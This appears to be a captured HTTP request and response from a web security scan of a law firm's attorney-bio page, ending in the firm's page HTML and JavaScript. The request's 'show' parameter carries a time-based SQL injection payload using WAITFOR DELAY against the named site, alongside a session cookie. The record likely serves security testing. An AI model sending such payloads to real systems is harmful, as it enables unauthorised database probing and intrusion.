O2k8OT47aTwxMT47aTwxMz47PjtsPHQ8cDxsPFRleHQ7PjtsPFw8c3BhbiBzdHlsZT0iY29sb3I6IzAwMDAwMCJcPlw8Qlw UFJBQ1RJQ0VTXDwvQlw XDxCUlw XDwvc3Bhblw IFw8YSB0YXJnZXQ9Il90b3AiIGhyZWY9ImhvbWVuZXcuYXNweD9zZWFyY2hsaW5rPXNob3dhcmVhbmV3JlNob3c9OCJcPlJlYWwgRXN0YXRlXDwvYVw LCBcPGEgdGFyZ2V0PSJfdG9wIiBocmVmPSJob21lbmV3LmFzcHg/c2VhcmNobGluaz1zaG93YXJlYW5ldyZTaG93PTE1Ilw Q29ycG9yYXRlLCBTZWN1cml0aWVzIGFuZCBGaW5hbmNpYWwgSW5zdGl0dXRpb25zXDwvYVw LCBcPGEgdGFyZ2V0PSJfdG9wIiBocmVmPSJob21lbmV3LmFzcHg/c2VhcmNobGluaz1zaG93YXJlYW5ldyZTaG93PTE3Ilw UmVkZXZlbG9wbWVudFw8L2FcPlw8QlJcPjs Pjs7Pjt0PHA8bDxUZXh0Oz47bDxcPGRpdlw DQpcPHBcPk1yLiBXaW5uaWNrIGlzIG9mZmljZSBtYW5hZ2luZyBwYXJ0bmVyIG9mIHRoZSBmaXJtJ3MgQm9zdG9uIE9mZmljZSBhbmQgYSByZWFsIGVzdGF0ZSBwYXJ0bmVyIGluIHRoZSBmaXJtJ3MgUmVhbCBFc3RhdGUvIENvbnN0cnVjdGlvbi8gRW52aXJvbm1lbnRhbCBQcmFjdGljZSBHcm91cC4gSGUmbmJzcFw7cmVwcmVzZW50cyBsZW5kZXJzIGluIG5lZ290aWF0aW5nIGFuZCBkb2N1bWVudGluZyBzZWN1cmVkIGxvYW4gdHJhbnNhY3Rpb25zIGluY2x1ZGluZyByZWFsIGVzdGF0ZSBsb2FucywgY29uc3RydWN0aW9uIGxvYW5zLCBwcml2YXRlIGJhbmtpbmcgYW5kIGFzc2V0LWJhc2VkIGxvYW5zLCBsZXR0ZXJzIG9mIGNyZWRpdCwmbmJzcFw7YW5kIHBhcnRpY2lwYXRpb24gYW5kIGFnZW5jeSBhZ3JlZW1lbnRzLlw8c3Bhblw Jm5ic3BcOyBcPC9zcGFuXD5IZSBpcyBhbHNvIGV4cGVyaWVuY2VkIGluIGNvbXBsZXggcmVhbCBlc3RhdGUgYWNxdWlzaXRpb25zIGFuZCBkaXNwb3NpdGlvbnMsIGNvbW1lcmNpYWwgbGVhc2luZywgb3duZXJzaGlwIHN0cnVjdHVyZXMsIHRheC1kZWZlcnJlZCBleGNoYW5nZXMsIGxvYW4gcmVzdHJ1Y3R1cmluZywgZm9yYmVhcmFuY2UgYWdyZWVtZW50cywgIndvcmtvdXRzIiBhbmQgZm9yZWNsb3N1cmVzLlw8c3Bhblw Jm5ic3BcOyBcPC9zcGFuXD5Nci4gV2lubmljayBoYXMgZXh0ZW5zaXZlIGV4cGVyaWVuY2UgaW4gcHJvcGVydHkgaW5zdXJhbmNlIG1hdHRlcnMgaW5jbHVkaW5nIHRoZSBoYW5kbGluZyBvZiBidWlsZGluZywgY29udGVudHMgYW5kIGJ1c2luZXNzIGludGVycnVwdGlvbiBjbGFpbXMgYW5kIHRoZSBkZXRlcm1pbmF0aW9uIG9mIGxvc3MgYW5kIGRhbWFnZSB0aHJvdWdoIHRoZSBSZWZlcmVuY2UgKGFyYml0cmF0aW9uKSBwcm9jZXNzLlw8L3BcPg0KXDxwXD5Nci4gV2lubmljaydzIHByYWN0aWNlIGFsc28gZm9jdXNlcyBvbiBnZW5lcmFsIGNvcnBvcmF0ZSBtYXR0ZXJzIGFuZCBidXNpbmVzcyB0cmFuc2FjdGlvbnMgYW5kIGhlIGNvdW5zZWxzIGhpcyBidXNpbmVzcyBjbGllbnRlbGUgd2l0aCByZXNwZWN0IHRvIHRoZSBhY3F1aXNpdGlvbiBhbmQgZGlzcG9zaXRpb24gb2YgYnVzaW5lc3MgYXNzZXRzLCBmaW5hbmNpbmcsIHJlYWwgcHJvcGVydHksIGVxdWlwbWVudCBsZWFzaW5nLCBjb250cmFjdHVhbCBhbmQgZW1wbG95bWVudCBtYXR0ZXJzIGFuZCBzdWNjZXNzaW9uIHBsYW5uaW5nLlw8c3Bhblw Jm5ic3BcOyBcPC9zcGFuXD5JbiBhZGRpdGlvbiwgTXIuIFdpbm5pY2sgbWFpbnRhaW5zIGEgc2lnbmlmaWNhbnQgYXV0b21vdGl2ZSBwcmFjdGljZSB3aGljaCBpbmNsdWRlcyB0aGUgYWNxdWlzaXRpb24gYW5kL29yIHNhbGUgb2YgYXV0b21vdGl2ZSBkZWFsZXJzaGlwcyBhbmQgdGhlIGZpbmFuY2luZyB0aGVyZW9mLCBwcm9wZXJ0eSBhY3F1aXNpdGlvbiBvciBhc3NvY2lhdGVkIGxlYXNpbmcsIG1hbnVmYWN0dXJlcnMnIGFncmVlbWVudHMsIGNvbnRyb2wgYWdyZWVtZW50cywgZXF1aXBtZW50IGxlYXNlcyBhbmQgb3duZXJzaGlwIHN0cnVjdHVyZS5cPC9wXD4NClw8cFw XDxzcGFuXD5Nci4gV2lubmljayB3YXMgcmVjb2duaXplZCBhcyBhIE1hc3NhY2h1c2V0dHMgU3VwZXIgTGF3eWVyIGZvciAyMDA0LCAyMDA1LCAyMDA2Llw8L3NwYW5cPlw8L3BcPlw8L2Rpdlw Oz4 Ozs O3Q8cDxsPFRleHQ7PjtsPFw8YnJcPlw8c3BhbiBzdHlsZT0iY29sb3I6IzAwMDAwMCJcPlw8Qlw RURVQ0FUSU9OXDwvYlw XDwvc3Bhblw XDxiclw XDxiclw TEwuQi4sIEJvc3RvbiBVbml2ZXJzaXR5IFNjaG9vbCBvZiBMYXcsIDE5NjZcPGJyXD5cPGltZyBhbGlnbj1taWRkbGUgc3JjPSJpbWFnZXMvYmxuay5naWYiIGJvcmRlcj0wIHdpZHRoPTEgaGVpZ2h0PTEgdnNwYWNlPTNcPlw8YnJcPkIuUy4sIFN1ZmZvbGsgVW5pdmVyc2l0eSwgMTk2Mzs Pjs7Pjt0PHA8bDxUZXh0Oz47bDxcPHNwYW4gc3R5bGU9ImNvbG9yOiMwMDAwMDAiXD5cPEJcPlw8QlJcPkFETUlTU0lPTlNcPEJSXD5cPEJSXD5cPC9CXD5cPC9zcGFuXD4NCk1hc3NhY2h1c2V0dHNcPGJyXD5cPGltZyBhbGlnbj1taWRkbGUgc3JjPSJpbWFnZXMvYmxuay5naWYiIGJvcmRlcj0wIHdpZHRoPTEgaGVpZ2h0PTEgdnNwYWNlPTNcPlw8YnJcPg0KVS5TLiBEaXN0cmljdCBDb3VydCwgRGlzdHJpY3Qgb2YgTWFzc2FjaHVzZXR0c1w8YnJcPlw8aW1nIGFsaWduPW1pZGRsZSBzcmM9ImltYWdlcy9ibG5rLmdpZiIgYm9yZGVyPTAgd2lkdGg9MSBoZWlnaHQ9MSB2c3BhY2U9M1w XDxiclw DQpVbml0ZWQgU3RhdGVzIFN1cHJlbWUgQ291cnRcPGJyXD5cPGltZyBhbGlnbj1taWRkbGUgc3JjPSJpbWFnZXMvYmxuay5naWYiIGJvcmRlcj0wIHdpZHRoPTEgaGVpZ2h0PTEgdnNwYWNlPTNcPlw8YnJcPlw8aW1nIGFsaWduPW1pZGRsZSBzcmM9ImltYWdlcy9ibG5rLmdpZiIgYm9yZGVyPTAgd2lkdGg9MSBoZWlnaHQ9MSB2c3BhY2U9M1w Oz4 Ozs O3Q8cDxsPFRleHQ7PjtsPFw8c3BhbiBzdHlsZT0iY29sb3I6IzAwMDAwMCJcPlw8Qlw XDxCUlw TUVNQkVSU0hJUFMgQU5EIFBST0ZFU1NJT05BTCBBQ1RJVklUSUVTXDxCUlw XDxCUlw XDwvQlw XDwvc3Bhblw DQpBbWVyaWNhbiBCYXIgQXNzb2NpYXRpb25cPGJyXD5cPGltZyBhbGlnbj1taWRkbGUgc3JjPSJpbWFnZXMvYmxuay5naWYiIGJvcmRlcj0wIHdpZHRoPTEgaGVpZ2h0PTEgdnNwYWNlPTNcPlw8YnJcPg0KTWFzc2FjaHVzZXR0cyBCYXIgQXNzb2NpYXRpb25cPGJyXD5cPGltZyBhbGlnbj1taWRkbGUgc3JjPSJpbWFnZXMvYmxuay5naWYiIGJvcmRlcj0wIHdpZHRoPTEgaGVpZ2h0PTEgdnNwYWNlPTNcPlw8YnJcPg0KQm9zdG9uIEJhciBBc3NvY2lhdGlvblw8YnJcPlw8aW1nIGFsaWduPW1pZGRsZSBzcmM9ImltYWdlcy9ibG5rLmdpZiIgYm9yZGVyPTAgd2lkdGg9MSBoZWlnaHQ9MSB2c3BhY2U9M1w XDxiclw XDxpbWcgYWxpZ249bWlkZGxlIHNyYz0iaW1hZ2VzL2JsbmsuZ2lmIiBib3JkZXI9MCB3aWR0aD0xIGhlaWdodD0xIHZzcGFjZT0zXD47Pj47Oz47Pj47Pj47Pj47PryijcfGDjG090UG3nv5PdrW3XqQ

Request

POST /new/showbionew.aspx?show=%27;WAITFOR%20DELAY%20%270:0:25%27--&Related=3 HTTP/1.1
Referer: http://www.mccarter.com/new/showbionew.aspx?show=1121&Related=
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: www.mccarter.com
Cookie: ASP.NET_SessionId=dovbcr45tyczie45c0bmue45
Content-Length: 5788
Accept-Encoding: gzip, deflate

__VIEWSTATE=dDwtMTc1NDMyNTc3Njt0PDtsPGk8Mj47aTw0PjtpPDY%2bO2k8OD47aTwxMD47PjtsPHQ8cDxsPFRleHQ7PjtsPEJ1cnRvbiBXaW5uaWNrOz4%2bOzs%2bO3Q8cDxsPFRleHQ7PjtsPFw8TUVUQSBOQU1FPSJLRVlXT1JEUyIgQ09OVEVOVD0iQnVydG9uLFdpbm5pY2ssQnVydG9uIFdpbm5pY2ssQ29ycG9yYXRlLCBTZWN1cml0aWVzIGFuZCBGaW5hbmNpYWwgSW5zdGl0dXRpb25zLFJlYWwgRXN0YXRlLFJlZGV2ZWxvcG1lbiIgXD4gOz4%2bOzs%2bO3Q8cDxsPFRleHQ7PjtsPFw8TUVUQSBOQU1FPSJERVNDUklQVElPTiIgQ09OVEVOVD0iDQogTXIuIFdpbm5pY2sgaXMgb2ZmaWNlIG1hbmFnaW5nIHBhcnRuZXIgb2YgdGhlIGZpcm0ncyBCb3N0b24gT2ZmaWNlIGFuZCBhIHJlYWwgZXN0YXRlIHBhcnRuZXIgaW4gdGhlIGZpcm0ncyBSZWFsIEVzdGF0ZS8gQ29uc3RydWN0aW9uLyBFbnZpcm9ubWVudGFsIFByYWN0aWNlIEdyb3VwLiBIZSZuYnNwXDtyZXByZXNlbnRzIGxlbmRlcnMgaW4gbmVnb3RpYXRpbmcgYW5kIGRvY3VtZW50aW5nIHNlY3VyZWQgbG9hbiB0cmFuc2FjdGlvbnMiXD47Pj47Oz47dDw7bDxpPDA%2bOz47bDx0PHA8bDxUZXh0Oz47bDxcPHNjcmlwdFw%2bYWxwaGEgPSBbJ0EnLCdCJywnQycsJ0QnLCdFJywnRicsJ0cnLCdIJywnSScsJ0onLCdLJywnTCcsJ00nLCdOJywnTycsJ1AnLCdRJywnUicsJ1MnLCdUJywnVScsJ1YnLCdXJywnWCcsJ1knLCdaJ11cO1w8L3NjcmlwdFw%2bOz4%2bOzs%2bOz4%2bO3Q8O2w8aTwxMz47PjtsPHQ8O2w8aTwxPjtpPDc%2bO2k8OT47aTwxMT47aTwxMz47PjtsPHQ8cDxsPFRleHQ7PjtsPFw8c3BhbiBzdHlsZT0iY29sb3I6IzAwMDAwMCJcPlw8Qlw%2bUFJBQ1RJQ0VTXDwvQlw%2bXDxCUlw%2bXDwvc3Bhblw%2bIFw8YSB0YXJnZXQ9Il90b3AiIGhyZWY9ImhvbWVuZXcuYXNweD9zZWFyY2hsaW5rPXNob3dhcmVhbmV3JlNob3c9OCJcPlJlYWwgRXN0YXRlXDwvYVw%2bLCBcPGEgdGFyZ2V0PSJfdG9wIiBocmVmPSJob21lbmV3LmFzcHg%2fc2VhcmNobGluaz1zaG93YXJlYW5ldyZTaG93PTE1Ilw%2bQ29ycG9yYXRlLCBTZWN1cml0aWVzIGFuZCBGaW5hbmNpYWwgSW5zdGl0dXRpb25zXDwvYVw%2bLCBcPGEgdGFyZ2V0PSJfdG9wIiBocmVmPSJob21lbmV3LmFzcHg%2fc2VhcmNobGluaz1zaG93YXJlYW5ldyZTaG93PTE3Ilw%2bUmVkZXZlbG9wbWVudFw8L2FcPlw8QlJcPjs%2bPjs7Pjt0PHA8bDxUZXh0Oz47bDxcPGRpdlw%2bDQpcPHBcPk1yLiBXaW5uaWNrIGlzIG9mZmljZSBtYW5hZ2luZyBwYXJ0bmVyIG9mIHRoZSBmaXJtJ3MgQm9zdG9uIE9mZmljZSBhbmQgYSByZWFsIGVzdGF0ZSBwYXJ0bmVyIGluIHRoZSBmaXJtJ3MgUmVhbCBFc3RhdGUvIENvbnN0cnVjdGlvbi8gRW52aXJvbm1lbnRhbCBQcmFjdGljZSBHcm91cC4gSGUmbmJzcFw7cmVwcmVzZW50cyBsZW5kZXJzIGluIG5lZ290aWF0aW5nIGFuZCBkb2N1bWVudGluZyBzZWN1cmVkIGxvYW4gdHJhbnNhY3Rpb25zIGluY2x1ZGluZyByZWFsIGVzdGF0ZSBsb2FucywgY29uc3RydWN0aW9uIGxvYW5zLCBwcml2YXRlIGJhbmtpbmcgYW5kIGFzc2V0LWJhc2VkIGxvYW5zLCBsZXR0ZXJzIG9mIGNyZWRpdCwmbmJzcFw7YW5kIHBhcnRpY2lwYXRpb24gYW5kIGFnZW5jeSBhZ3JlZW1lbnRzLlw8c3Bhblw%2bJm5ic3BcOyBcPC9zcGFuXD5IZSBpcyBhbHNvIGV4cGVyaWVuY2VkIGluIGNvbXBsZXggcmVhbCBlc3RhdGUgYWNxdWlzaXRpb25zIGFuZCBkaXNwb3NpdGlvbnMsIGNvbW1lcmNpYWwgbGVhc2luZywgb3duZXJzaGlwIHN0cnVjdHVyZXMsIHRheC1kZWZlcnJlZCBleGNoYW5nZXMsIGxvYW4gcmVzdHJ1Y3R1cmluZywgZm9yYmVhcmFuY2UgYWdyZWVtZW50cywgIndvcmtvdXRzIiBhbmQgZm9yZWNsb3N1cmVzLlw8c3Bhblw%2bJm5ic3BcOyBcPC9zcGFuXD5Nci4gV2lubmljayBoYXMgZXh0ZW5zaXZlIGV4cGVyaWVuY2UgaW4gcHJvcGVydHkgaW5zdXJhbmNlIG1hdHRlcnMgaW5jbHVkaW5nIHRoZSBoYW5kbGluZyBvZiBidWlsZGluZywgY29udGVudHMgYW5kIGJ1c2luZXNzIGludGVycnVwdGlvbiBjbGFpbXMgYW5kIHRoZSBkZXRlcm1pbmF0aW9uIG9mIGxvc3MgYW5kIGRhbWFnZSB0aHJvdWdoIHRoZSBSZWZlcmVuY2UgKGFyYml0cmF0aW9uKSBwcm9jZXNzLlw8L3BcPg0KXDxwXD5Nci4gV2lubmljaydzIHByYWN0aWNlIGFsc28gZm9jdXNlcyBvbiBnZW5lcmFsIGNvcnBvcmF0ZSBtYXR0ZXJzIGFuZCBidXNpbmVzcyB0cmFuc2FjdGlvbnMgYW5kIGhlIGNvdW5zZWxzIGhpcyBidXNpbmVzcyBjbGllbnRlbGUgd2l0aCByZXNwZWN0IHRvIHRoZSBhY3F1aXNpdGlvbiBhbmQgZGlzcG9zaXRpb24gb2YgYnVzaW5lc3MgYXNzZXRzLCBmaW5hbmNpbmcsIHJlYWwgcHJvcGVydHksIGVxdWlwbWVudCBsZWFzaW5nLCBjb250cmFjdHVhbCBhbmQgZW1wbG95bWVudCBtYXR0ZXJzIGFuZCBzdWNjZXNzaW9uIHBsYW5uaW5nLlw8c3Bhblw%2bJm5ic3BcOyBcPC9zcGFuXD5JbiBhZGRpdGlvbiwgTXIuIFdpbm5pY2sgbWFpbnRhaW5zIGEgc2lnbmlmaWNhbnQgYXV0b21vdGl2ZSBwcmFjdGljZSB3aGljaCBpbmNsdWRlcyB0aGUgYWNxdWlzaXRpb24gYW5kL29yIHNhbGUgb2YgYXV0b21vdGl2ZSBkZWFsZXJzaGlwcyBhbmQgdGhlIGZpbmFuY2luZyB0aGVyZW9mLCBwcm9wZXJ0eSBhY3F1aXNpdGlvbiBvciBhc3NvY2lhdGVkIGxlYXNpbmcsIG1hbnVmYWN0dXJlcnMnIGFncmVlbWVudHMsIGNvbnRyb2wgYWdyZWVtZW50cywgZXF1aXBtZW50IGxlYXNlcyBhbmQgb3duZXJzaGlwIHN0cnVjdHVyZS5cPC9wXD4NClw8cFw%2bXDxzcGFuXD5Nci4gV2lubmljayB3YXMgcmVjb2duaXplZCBhcyBhIE1hc3NhY2h1c2V0dHMgU3VwZXIgTGF3eWVyIGZvciAyMDA0LCAyMDA1LCAyMDA2Llw8L3NwYW5cPlw8L3BcPlw8L2Rpdlw%2bOz4%2bOzs%2bO3Q8cDxsPFRleHQ7PjtsPFw8YnJcPlw8c3BhbiBzdHlsZT0iY29sb3I6IzAwMDAwMCJcPlw8Qlw%2bRURVQ0FUSU9OXDwvYlw%2bXDwvc3Bhblw%2bXDxiclw%2bXDxiclw%2bTEwuQi4sIEJvc3RvbiBVbml2ZXJzaXR5IFNjaG9vbCBvZiBMYXcsIDE5NjZcPGJyXD5cPGltZyBhbGlnbj1taWRkbGUgc3JjPSJpbWFnZXMvYmxuay5naWYiIGJvcmRlcj0wIHdpZHRoPTEgaGVpZ2h0PTEgdnNwYWNlPTNcPlw8YnJcPkIuUy4sIFN1ZmZvbGsgVW5pdmVyc2l0eSwgMTk2Mzs%2bPjs7Pjt0PHA8bDxUZXh0Oz47bDxcPHNwYW4gc3R5bGU9ImNvbG9yOiMwMDAwMDAiXD5cPEJcPlw8QlJcPkFETUlTU0lPTlNcPEJSXD5cPEJSXD5cPC9CXD5cPC9zcGFuXD4NCk1hc3NhY2h1c2V0dHNcPGJyXD5cPGltZyBhbGlnbj1taWRkbGUgc3JjPSJpbWFnZXMvYmxuay5naWYiIGJvcmRlcj0wIHdpZHRoPTEgaGVpZ2h0PTEgdnNwYWNlPTNcPlw8YnJcPg0KVS5TLiBEaXN0cmljdCBDb3VydCwgRGlzdHJpY3Qgb2YgTWFzc2FjaHVzZXR0c1w8YnJcPlw8aW1nIGFsaWduPW1pZGRsZSBzcmM9ImltYWdlcy9ibG5rLmdpZiIgYm9yZGVyPTAgd2lkdGg9MSBoZWlnaHQ9MSB2c3BhY2U9M1w%2bXDxiclw%2bDQpVbml0ZWQgU3RhdGVzIFN1cHJlbWUgQ291cnRcPGJyXD5cPGltZyBhbGlnbj1taWRkbGUgc3JjPSJpbWFnZXMvYmxuay5naWYiIGJvcmRlcj0wIHdpZHRoPTEgaGVpZ2h0PTEgdnNwYWNlPTNcPlw8YnJcPlw8aW1nIGFsaWduPW1pZGRsZSBzcmM9ImltYWdlcy9ibG5rLmdpZiIgYm9yZGVyPTAgd2lkdGg9MSBoZWlnaHQ9MSB2c3BhY2U9M1w%2bOz4%2bOzs%2bO3Q8cDxsPFRleHQ7PjtsPFw8c3BhbiBzdHlsZT0iY29sb3I6IzAwMDAwMCJcPlw8Qlw%2bXDxCUlw%2bTUVNQkVSU0hJUFMgQU5EIFBST0ZFU1NJT05BTCBBQ1RJVklUSUVTXDxCUlw%2bXDxCUlw%2bXDwvQlw%2bXDwvc3Bhblw%2bDQpBbWVyaWNhbiBCYXIgQXNzb2NpYXRpb25cPGJyXD5cPGltZyBhbGlnbj1taWRkbGUgc3JjPSJpbWFnZXMvYmxuay5naWYiIGJvcmRlcj0wIHdpZHRoPTEgaGVpZ2h0PTEgdnNwYWNlPTNcPlw8YnJcPg0KTWFzc2FjaHVzZXR0cyBCYXIgQXNzb2NpYXRpb25cPGJyXD5cPGltZyBhbGlnbj1taWRkbGUgc3JjPSJpbWFnZXMvYmxuay5naWYiIGJvcmRlcj0wIHdpZHRoPTEgaGVpZ2h0PTEgdnNwYWNlPTNcPlw8YnJcPg0KQm9zdG9uIEJhciBBc3NvY2lhdGlvblw8YnJcPlw8aW1nIGFsaWduPW1pZGRsZSBzcmM9ImltYWdlcy9ibG5rLmdpZiIgYm9yZGVyPTAgd2lkdGg9MSBoZWlnaHQ9MSB2c3BhY2U9M1w%2bXDxiclw%2bXDxpbWcgYWxpZ249bWlkZGxlIHNyYz0iaW1hZ2VzL2JsbmsuZ2lmIiBib3JkZXI9MCB3aWR0aD0xIGhlaWdodD0xIHZzcGFjZT0zXD47Pj47Oz47Pj47Pj47Pj47PryijcfGDjG090UG3nv5PdrW3XqQ

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 18:34:49 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 31238



<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<HTML>
<HEAD>
<title>McCarter&amp;English | Daniel Pollack</title>
<META NAME="KEYWORDS" CONTENT="Daniel,Pollack,Daniel Pollack," >
<META NAME="DESCRIPTION" CONTENT="Mr. Pollack has practiced law in New York City for over 40 years. His practice has centered on the conduct of financial litigation, advising corporations on issues of corporate governance and advising executives on employment agreements and exit agre">

<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<META NAME="ROBOTS" CONTENT="NOYDIR,NOODP">
<META NAME="KEYWORDS" CONTENT="McCarter,McCarter & English,McCarter and English,McCarter English">
<META NAME="DESCRIPTION" CONTENT="McCarter & English, LLP is a firm of over 400 lawyers with offices in Boston, Hartford, Stamford, New York City, Newark, Philadelphia and Wilmington.">
<script language="JavaScript" type="text/JavaScript">
<!--
function OpenWindow(url, name,features )
{
window.open(url, name,features)
}

function MM_preloadImages() { //v3.0
var d=document; if(d.images){ if(!d.MM_p) d.MM_p=new Array();
var i,j=d.MM_p.length,a=MM_preloadImages.arguments; for(i=0; i<a.length; i++)
if (a[i].indexOf("#")!=0){ d.MM_p[j]=new Image; d.MM_p[j++].src=a[i];}}
}

function MM_swapImgRestore() { //v3.0
var i,x,a=document.MM_sr; for(i=0;a&&i<a.length&&(x=a[i])&&x.oSrc;i++) x.src=x.oSrc;
}

function MM_findObj(n, d) { //v4.01
var p,i,x; if(!d) d=document; if((p=n.indexOf("?"))>0&&parent.frames.length) {
d=parent.frames[n.substring(p+1)].document; n=n.substring(0,p);}
if(!(x=d[n])&&d.all) x=d.all[n]; for (i=0;!x&&i<d.forms.length;i++) x=d.forms[i][n];
for(i=0;!x&&d.layers&&i<d.layers.length;i++) x=MM_findObj(n,d.layers[i].document);
if(!x && d.getElementById) x=d.getElementById(n); return x;
}

function MM_swapImage() { //v3.0
var i,j=0,x,a=MM_swapImage.arguments; document.MM_sr=new Array; for(i=0;i<(a.length-2);i+=3)
if ((x=MM_findObj(a[i]))!=null){document.MM_sr[j++]=x; if(!x.oSrc) x.oSrc=x.src; x.src=a[i+2];}
}

function MM_reloadPage(init) { //reloads the window if Nav4 resized
if (init==true) with (navigator) {if ((appName=="Netscape")&&(parseInt(appVersion)==4)) {
document.MM_pgW=innerWidth; document.MM_pgH=innerHeight; onresize=MM_reloadPage; }}
else if (innerWidth!=document.MM_pgW || innerHeight!=document.MM_pgH) location.reload();
}
MM_reloadPage(true);
//-->
</script>
<script>
function MM_jumpMenu(targ,selObj,restore){ //v3.0
eval(targ+".location='"+selObj.options[selObj.selectedIndex].value+"'");
if (restore) selObj.selectedIndex=0;
}
</script>
<script>
function emailWarning(){
//str = 'NOTICE.  These materials have been prepared by McCarter &amp; English, LLP for ' +
// 'informational purposes only and are not legal advice.  This information is not ' +
// 'intended to create, and receipt of it does not constitute, a lawyer-client ' +
// 'relationship.  You should not act upon this information without seeking ' +
// 'professional counsel.  In addition, we cannot represent you until we know that ' +
// 'doing so will not create a conflict of interest.  Nor can we treat unsolicited ' +
// 'information as confidential. \n\nAccordingly, please do not send us any ' +
// 'information about any matter that may involve you until you receive a ' +
// 'written statement from us that we represent you (an "engagement letter").\n\nBy ' +
// 'clicking "OK" you are confirming that you have read and understand this notice';

str = 'The McCarter & English website is for informational purposes only. We do not provide legal advice on this website. We can provide legal advice only to our clients in specific inquiries that they address to us. If you are interested in becoming a client, please contact us, but do not send us any information about your specific legal question. We cannot serve as your lawyers until we establish an attorney-client relationship, which can occur only after we follow procedures within our firm and after we agree to the terms of representation.'

return(confirm(str));
}
</script>
<link href="stylesnormal.css" rel="stylesheet" type="text/css">
<link href="css/me_allnew.css" rel="stylesheet" type="text/css">
<SCRIPT language="javascript" src="SlideMenuNew.js" type="text/javascript"></SCRIPT>
<SCRIPT language="javascript" src="MM.js" type="text/javascript"></SCRIPT>
<script>alpha = ['A','B','C','D','E','F','G','H','I','J','K','L','M','N','O','P','Q','R','S','T','U','V','W','X','Y','Z'];</script>
<script language="javascript" type="text/javascript">
function decryptString(str){
strLength = str.length;
strKey = "pwmeucnwskdweiwoeixmewuwnexmcvhknrd";
keyLength = strKey.length;
decryptedStr = "";
var i;
for(i = 0;i<strLength;i++){
if(str.charAt(i) != "?"){
offset = alpha.join('').indexOf(strKey.charAt(i % keyLength).toUpperCase());
charIndex = alpha.join('').indexOf(str.charAt(i).toUpperCase());
//alert(charIndex);
plainTextIndex = (charIndex - offset);
if(plainTextIndex < 0){
while(plainTextIndex < 0){
plainTextIndex = (alpha.length) + plainTextIndex; //Add cuz PlainTextIndex is negative
}
}else{
plainTextIndex = plainTextIndex % (alpha.length);
}
if(charIndex > -1){
tmpChar = alpha[plainTextIndex];
}else{
tmpChar = str.charAt(i).toUpperCase();
}
if(str.charAt(i).toUpperCase() != str.charAt(i)) tmpChar = tmpChar.toLowerCase();
decryptedStr = decryptedStr + tmpChar;
}else{
for(j=i;j<strLength;j++){
decryptedStr = decryptedStr + str.charAt(j);
}
break;
}
}
return decryptedStr;
}
function decryptAll(){
var i;
for(i=0;i<document.links.length;i++){
if(document.links[i].protocol == "mailto:" && document.links[i].getAttribute("encrypted") == "true"){
document.links[i].href = "mailto:" + decryptString(document.links[i].href.substring(document.links[i].href.indexOf(':')+1));
if(document.links[i].innerHTML.indexOf('@') > 0){
if(document.links[i].innerHTML.indexOf('?') > 0){
document.links[i].innerHTML = document.links[i].href.substring(document.links[i].href.indexOf(':')+1,document.links[i].href.indexOf('?')-document.links[i].href.indexOf(':')+2);
}else{
document.links[i].innerHTML = document.links[i].href.substring(document.links[i].href.indexOf(':')+1);
}
}
//if(document.links[i].innerHTML.indexOf('mailto:') > 0) document.links[i].innerHTML = document.links[i].href.substring(document.links[i].href.indexOf(':')+1);
document.links[i].setAttribute("encrypted","false");
document.links[i].style.visibility = '';
}
}
document.body.onmouseover = function(){};
}
</script>
<SCRIPT language="JavaScript" type="text/javascript">
var menu1;
var menu2;
var menu3;
var menu4;
var menu5;
var menu6;
function buildMenus(){
menu1 = new ypSlideOutMenu("menu1", "", '','', 150, 100);
menu2 = new ypSlideOutMenu("menu2", "", '','', 190, 100);
menu3 = new ypSlideOutMenu("menu3", "", '','', 150, 100);
menu4 = new ypSlideOutMenu("menu4", "", '','', 150, 125);
menu5 = new ypSlideOutMenu("menu5", "", '','', 150, 100);
menu6 = new ypSlideOutMenu("menu6", "", '','', 150, 125);
}
buildMenus();
function repositionMenus(){
}
//window.onresize = repositionMenus;
</SCRIPT>

<style type="text/css">

P,TD,FONT,SPAN,DIV { COLOR: #666666; font-family: Arial; font-size: 11px; }
FONT { COLOR: #666666; font-family: Arial; font-size: 11px; }
A { text-decoration:none; }
A:Hover{ text-decoration:none; color:#000000; }
body { <!--SCROLLBAR-FACE-COLOR: #ffffff; SCROLLBAR-HIGHLIGHT-COLOR: #ffffff; SCROLLBAR-SHADOW-COLOR: #ffffff; SCROLLBAR-3DLIGHT-COLOR: #969696; SCROLLBAR-ARROW-COLOR: #000000; SCROLLBAR-TRACK-COLOR: #969696; SCROLLBAR-DARKSHADOW-COLOR: #000000;--> scrollbar-face-color:#ffffff;scrollbar-arrow-color:#000000;scrollbar-track-color:#ffffff;scrollbar-shadow-color:#ffffff;scrollbar-highlight-color:#ffffff;scrollbar-3dlight-color:#ffffff;scrollbar-darkshadow-color:#ffffff; }
</style>
</HEAD>
<body vLink="#666666" aLink="#666666" link="#666666" style="MARGIN-TOP:0px;MARGIN-BOTTOM:0px;MARGIN-LEFT:0px">
<form name="Form1" method="post" action="showbionew.aspx?show=%27;WAITFOR%20DELAY%20%270:0:25%27--&amp;Related=3" id="Form1">
